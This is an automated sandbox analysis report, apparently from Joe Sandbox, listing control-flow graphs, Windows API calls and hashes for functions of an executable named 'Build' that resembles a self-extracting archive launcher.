                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                    • String ID: \
                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                    • Opcode ID: c7e76d0fc234e949c1d7964ed96513600a2e39f3167ff8ce20e4aeb85e91d17e
                                                                                                    • Instruction ID: 0e9ce0ccd3804b56c82309e926659cdd43038d38494fdd44f46eb8a0409dad85
                                                                                                    • Opcode Fuzzy Hash: c7e76d0fc234e949c1d7964ed96513600a2e39f3167ff8ce20e4aeb85e91d17e
                                                                                                    • Instruction Fuzzy Hash: C93104B165D3006FE310DF64DC5AF7BBBACFB45B04F10091DF5A19A2A0C7A099048B76

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 868 93fafc-93fb2e call 941590 871 93fb34-93fb40 call 946433 868->871 872 93fd7e-93fd95 call 9410f9 868->872 871->872 877 93fb46-93fb6e call 942640 871->877 880 93fb70 877->880 881 93fb78-93fb89 877->881 880->881 882 93fb94-93fb9d 881->882 883 93fb8b-93fb92 881->883 884 93fb9f-93fba3 882->884 885 93fbfa 882->885 883->884 887 93fba6-93fbac 884->887 886 93fbfe-93fc00 885->886 888 93fc02-93fc05 886->888 889 93fc07-93fc09 886->889 890 93fbae 887->890 891 93fbcd-93fbda 887->891 888->889 895 93fc1c-93fc32 call 92d848 888->895 889->895 896 93fc0b-93fc12 889->896 892 93fbb8-93fbc2 890->892 893 93fd53-93fd55 891->893 894 93fbe0-93fbe4 891->894 897 93fbb0-93fbb6 892->897 898 93fbc4 892->898 900 93fd59-93fd61 893->900 899 93fbea-93fbf4 894->899 894->900 906 93fc34-93fc41 call 934168 895->906 907 93fc4b-93fc56 call 92bccb 895->907 896->895 901 93fc14 896->901 897->892 904 93fbc6-93fbc9 897->904 898->891 899->887 905 93fbf6 899->905 900->886 901->895 904->891 905->885 906->907 912 93fc43 906->912 913 93fc73-93fc80 ShellExecuteExW 907->913 914 93fc58-93fc6f call 92d563 907->914 912->907 913->872 916 93fc86-93fc8c 913->916 914->913 918 93fc9f-93fca1 916->918 919 93fc8e-93fc95 916->919 920 93fca3-93fcac 918->920 921 93fcb8-93fcd7 call 94004d 918->921 919->918 922 93fc97-93fc9d 919->922 920->921 929 93fcae-93fcb6 ShowWindow 920->929 923 93fd0e-93fd1a CloseHandle 921->923 939 93fcd9-93fce1 921->939 922->918 922->923 926 93fd2b-93fd39 923->926 927 93fd1c-93fd29 call 934168 923->927 930 93fd3b-93fd3d 926->930 931 93fd6d-93fd6f 926->931 927->926 937 93fd66 927->937 929->921 930->931 934 93fd3f-93fd45 930->934 931->872 936 93fd71-93fd73 931->936 934->931 938 93fd47-93fd51 934->938 936->872 940 93fd75-93fd78 ShowWindow 936->940 937->931 938->931 939->923 941 93fce3-93fcf4 GetExitCodeProcess 939->941 940->872 941->923 942 93fcf6-93fd00 941->942 943 93fd02 942->943 944 93fd07 942->944 943->944 944->923
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0093FB35
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0093FC78
                                                                                                    • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0093FCB0
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0093FCEC
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0093FD12
                                                                                                    • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0093FD78
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                    • String ID: .exe$.inf
                                                                                                    • API String ID: 36480843-3750412487
                                                                                                    • Opcode ID: 9b3085f76b4ffb71bfa3011db65f28381a1d4915e0e0cf0998f07a407a2481b2
                                                                                                    • Instruction ID: 05a0ec92d19f86590d5229f28976609e8a6157ede597ef6bd357780824db9183
                                                                                                    • Opcode Fuzzy Hash: 9b3085f76b4ffb71bfa3011db65f28381a1d4915e0e0cf0998f07a407a2481b2
                                                                                                    • Instruction Fuzzy Hash: F16103719083849EDB309F60D864ABBBBE9AF84744F04482EF8D497290D774DD88DF52

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 945 94cfab-94cfc4 946 94cfc6-94cfd6 call 95159c 945->946 947 94cfda-94cfdf 945->947 946->947 954 94cfd8 946->954 949 94cfe1-94cfe9 947->949 950 94cfec-94d010 MultiByteToWideChar 947->950 949->950 952 94d016-94d022 950->952 953 94d1a3-94d1b6 call 9410f9 950->953 955 94d024-94d035 952->955 956 94d076 952->956 954->947 960 94d054-94d065 call 94bc8e 955->960 961 94d037-94d046 call 954660 955->961 959 94d078-94d07a 956->959 963 94d080-94d093 MultiByteToWideChar 959->963 964 94d198 959->964 960->964 971 94d06b 960->971 961->964 970 94d04c-94d052 961->970 963->964 968 94d099-94d0ab call 94d5bc 963->968 969 94d19a-94d1a1 call 94d213 964->969 975 94d0b0-94d0b4 968->975 969->953 974 94d071-94d074 970->974 971->974 974->959 975->964 977 94d0ba-94d0c1 975->977 978 94d0c3-94d0c8 977->978 979 94d0fb-94d107 977->979 978->969 982 94d0ce-94d0d0 978->982 980 94d153 979->980 981 94d109-94d11a 979->981 983 94d155-94d157 980->983 985 94d135-94d146 call 94bc8e 981->985 986 94d11c-94d12b call 954660 981->986 982->964 984 94d0d6-94d0f0 call 94d5bc 982->984 987 94d191-94d197 call 94d213 983->987 988 94d159-94d172 call 94d5bc 983->988 984->969 998 94d0f6 984->998 985->987 1001 94d148 985->1001 986->987 1000 94d12d-94d133 986->1000 987->964 988->987 1002 94d174-94d17b 988->1002 998->964 1003 94d14e-94d151 1000->1003 1001->1003 1004 94d1b7-94d1bd 1002->1004 1005 94d17d-94d17e 1002->1005 1003->983 1006 94d17f-94d18f WideCharToMultiByte 1004->1006 1005->1006 1006->987 1007 94d1bf-94d1c6 call 94d213 1006->1007 1007->969
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00947F99,00947F99,?,?,?,0094D1FC,00000001,00000001,62E85006), ref: 0094D005
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0094D1FC,00000001,00000001,62E85006,?,?,?), ref: 0094D08B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0094D185
                                                                                                    • __freea.LIBCMT ref: 0094D192
                                                                                                      • Part of subcall function 0094BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0
                                                                                                    • __freea.LIBCMT ref: 0094D19B
                                                                                                    • __freea.LIBCMT ref: 0094D1C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: be9d7e60666cee04f9ce98a8b5bf28c1cb2c2600e425350e2b890523f8c0739e
                                                                                                    • Instruction ID: c49edb0d7bc54c690acd8bbad99674b76bd0397c690c18fc0223b8c807de05ce
                                                                                                    • Opcode Fuzzy Hash: be9d7e60666cee04f9ce98a8b5bf28c1cb2c2600e425350e2b890523f8c0739e
                                                                                                    • Instruction Fuzzy Hash: 6251D176615216AFEB298F64CC81FBF77AAEB88710F144669FC15D7140EB34DC84C690

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 009328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009328D4
                                                                                                      • Part of subcall function 009328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00931309,Crypt32.dll,00000000,00931383,00000200,?,00931366,00000000,00000000,?), ref: 009328F4
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0093CCF2
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0093CD29
                                                                                                    • SHGetMalloc.SHELL32(0096C460), ref: 0093CD33
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                    • String ID: riched20.dll$3To
                                                                                                    • API String ID: 3498096277-2168385784
                                                                                                    • Opcode ID: 5e6e9e146a323a4d2f815e03046d2d86f5a188e2de8ba19dc4db2a1d5c7ead88
                                                                                                    • Instruction ID: d103651a77deb41549a3a1090d77dadbdae255436eef8e8ff564916063083a43
                                                                                                    • Opcode Fuzzy Hash: 5e6e9e146a323a4d2f815e03046d2d86f5a188e2de8ba19dc4db2a1d5c7ead88
                                                                                                    • Instruction Fuzzy Hash: 99F0F9B1D04209ABCB10AF9AD8499EFFBFCEF94705F10405AF811A2251DBB496459BA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1014 9312f6-9312fd 1015 931332-931333 1014->1015 1016 9312ff-93130d call 9328ab 1014->1016 1019 93130f-93132b GetProcAddress * 2 1016->1019 1020 93132e 1016->1020 1019->1020 1020->1015
                                                                                                    APIs
                                                                                                      • Part of subcall function 009328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009328D4
                                                                                                      • Part of subcall function 009328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00931309,Crypt32.dll,00000000,00931383,00000200,?,00931366,00000000,00000000,?), ref: 009328F4
                                                                                                    • GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00931315
                                                                                                    • GetProcAddress.KERNEL32(0096C1F0,CryptUnprotectMemory), ref: 00931325
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                    • Opcode ID: f1a72ea76c1e31695efa791dfe18f65e57c07e09979c36541cd52035ebafff6c
                                                                                                    • Instruction ID: 1cde6e28cb7ff136a1e6f70458ca893eb8703b31bec6f304b75db96e997431a7
                                                                                                    • Opcode Fuzzy Hash: f1a72ea76c1e31695efa791dfe18f65e57c07e09979c36541cd52035ebafff6c
                                                                                                    • Instruction Fuzzy Hash: C8E08C70A657019ED760AF3A9D09B427EF89F69706F848C1DE4CA936D0DAB4E8848F10

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1021 92b2b0-92b2ea call 941590 1024 92b2f5 1021->1024 1025 92b2ec-92b2ef 1021->1025 1026 92b2f7-92b308 1024->1026 1025->1024 1027 92b2f1-92b2f3 1025->1027 1028 92b310-92b31a 1026->1028 1029 92b30a 1026->1029 1027->1026 1030 92b31f-92b32c call 927eed 1028->1030 1031 92b31c 1028->1031 1029->1028 1034 92b334-92b34d CreateFileW 1030->1034 1035 92b32e 1030->1035 1031->1030 1036 92b39b-92b39f 1034->1036 1037 92b34f-92b36e GetLastError call 92da1e 1034->1037 1035->1034 1039 92b3a3-92b3a6 1036->1039 1040 92b3a8-92b3ad 1037->1040 1046 92b370-92b393 CreateFileW GetLastError 1037->1046 1039->1040 1041 92b3b9-92b3be 1039->1041 1040->1041 1043 92b3af 1040->1043 1044 92b3c0-92b3c3 1041->1044 1045 92b3df-92b3f0 1041->1045 1043->1041 1044->1045 1047 92b3c5-92b3d9 SetFileTime 1044->1047 1048 92b3f2-92b407 call 93268b 1045->1048 1049 92b40b-92b424 call 9410f9 1045->1049 1046->1039 1050 92b395-92b399 1046->1050 1047->1045 1048->1049 1050->1039
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00928846,?,00000005), ref: 0092B342
                                                                                                    • GetLastError.KERNEL32(?,?,00928846,?,00000005), ref: 0092B34F
                                                                                                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00928846,?,00000005), ref: 0092B382
                                                                                                    • GetLastError.KERNEL32(?,?,00928846,?,00000005), ref: 0092B38A
                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00928846,?,00000005), ref: 0092B3D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                    • String ID:
                                                                                                    • API String ID: 1999340476-0
                                                                                                    • Opcode ID: 75a24e729e5f9f3031de07af43ea52b81c4fb9be03c599124176b5192adfdf62
                                                                                                    • Instruction ID: 9ea6a7c44e6e3f3a346929e76545dec605b2f989379dc0684b418c518160d31d
                                                                                                    • Opcode Fuzzy Hash: 75a24e729e5f9f3031de07af43ea52b81c4fb9be03c599124176b5192adfdf62
                                                                                                    • Instruction Fuzzy Hash: 8541253054A755AFD320DF35EC45BAABBD8BB44320F100B19F9A1972D1D7B1A948CB91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1084 93d864-93d87d PeekMessageW 1085 93d8b8-93d8ba 1084->1085 1086 93d87f-93d893 GetMessageW 1084->1086 1087 93d895-93d8a2 IsDialogMessageW 1086->1087 1088 93d8a4-93d8b2 TranslateMessage DispatchMessageW 1086->1088 1087->1085 1087->1088 1088->1085
                                                                                                    APIs
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0093D875
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D886
                                                                                                    • IsDialogMessageW.USER32(00010458,?), ref: 0093D89A
                                                                                                    • TranslateMessage.USER32(?), ref: 0093D8A8
                                                                                                    • DispatchMessageW.USER32(?), ref: 0093D8B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1266772231-0
                                                                                                    • Opcode ID: 14500b33536af663696c2f8ddbe091344a8ff6367a0730a60ddb855f747581f8
                                                                                                    • Instruction ID: c51794176906bc3d48304278bc5371890efbaeca04156c1fce68783096f00f59
                                                                                                    • Opcode Fuzzy Hash: 14500b33536af663696c2f8ddbe091344a8ff6367a0730a60ddb855f747581f8
                                                                                                    • Instruction Fuzzy Hash: 83F0307291A219ABDB20AFF5EC4CDEBBFBCEE052517004414F516D2150E724E505DBB0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1089 93cb49-93cb72 GetClassNameW 1090 93cb74-93cb89 call 934168 1089->1090 1091 93cb9a-93cb9c 1089->1091 1098 93cb8b-93cb97 FindWindowExW 1090->1098 1099 93cb99 1090->1099 1092 93cba7-93cbb3 call 9410f9 1091->1092 1093 93cb9e-93cba1 SHAutoComplete 1091->1093 1093->1092 1098->1099 1099->1091
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0093CB6A
                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0093CBA1
                                                                                                      • Part of subcall function 00934168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0092E084,00000000,.exe,?,?,00000800,?,?,?,0093AD5D), ref: 0093417E
                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0093CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                    • String ID: EDIT
                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                    • Opcode ID: 373ebc3a8a0e3527d82dc69d38c4404570ed8e93b36d5a6b50bfc4129bfcc8a2
                                                                                                    • Instruction ID: 12e43828b029194cad06ac1883e8cd25159c462aff65bb03822c5b5c43fb5afa
                                                                                                    • Opcode Fuzzy Hash: 373ebc3a8a0e3527d82dc69d38c4404570ed8e93b36d5a6b50bfc4129bfcc8a2
                                                                                                    • Instruction Fuzzy Hash: F6F0C871609714ABDB209B659C06FAFF7BC9F85B01F110055F901F7280D6B0EA05CBA5

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1100 93ffdd-940011 call 941590 SetEnvironmentVariableW call 9323d6 1104 940016-94001a 1100->1104 1105 94001c-940020 1104->1105 1106 94003e-94004a call 9410f9 1104->1106 1107 940029-940030 call 9324f2 1105->1107 1112 940022-940028 1107->1112 1113 940032-940038 SetEnvironmentVariableW 1107->1113 1112->1107 1113->1106
                                                                                                    APIs
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0093FFFE
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00940038
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentVariable
                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                    • Opcode ID: 0a1cb0529a4dd372f1fb63327dbff190a16ecc93ba4a8708ba72abab5013574b
                                                                                                    • Instruction ID: d14ab1d5433fd59288f9a9e1b340eb6257d8ddf6a6e92da5a2092ef68f14748d
                                                                                                    • Opcode Fuzzy Hash: 0a1cb0529a4dd372f1fb63327dbff190a16ecc93ba4a8708ba72abab5013574b
                                                                                                    • Instruction Fuzzy Hash: 4AF02B71911334ABC720AF919C05EBF77DCDF8DB41B400019FE45A7181DAB49D80DBA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1114 946232-946247 LoadLibraryExW 1115 946249-946252 GetLastError 1114->1115 1116 94627b-94627c 1114->1116 1117 946254-946268 call 9488f8 1115->1117 1118 946279 1115->1118 1117->1118 1121 94626a-946278 LoadLibraryExW 1117->1121 1118->1116
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,009461E3,00000000,00000001,009860C8,?,?,?,00946386,00000004,InitializeCriticalSectionEx,00959624,InitializeCriticalSectionEx), ref: 0094623F
                                                                                                    • GetLastError.KERNEL32(?,009461E3,00000000,00000001,009860C8,?,?,?,00946386,00000004,InitializeCriticalSectionEx,00959624,InitializeCriticalSectionEx,00000000,?,0094613D), ref: 00946249
                                                                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00945083), ref: 00946271
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                    • Opcode ID: 3f603b705ecbd9c8b18b2ee9aa0f4cd8dffae689f8096ab08f594d78e62021de
                                                                                                    • Instruction ID: 03687333ad89ce2fa81a8c24d99a095ed1d8c1963b47a50d7edf4f43c2f5ef99
                                                                                                    • Opcode Fuzzy Hash: 3f603b705ecbd9c8b18b2ee9aa0f4cd8dffae689f8096ab08f594d78e62021de
                                                                                                    • Instruction Fuzzy Hash: B8E04F70684308B7EF101F72EC06F5A3F68AB01B63F500020FA2DE84E0EBA59950A685
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B161
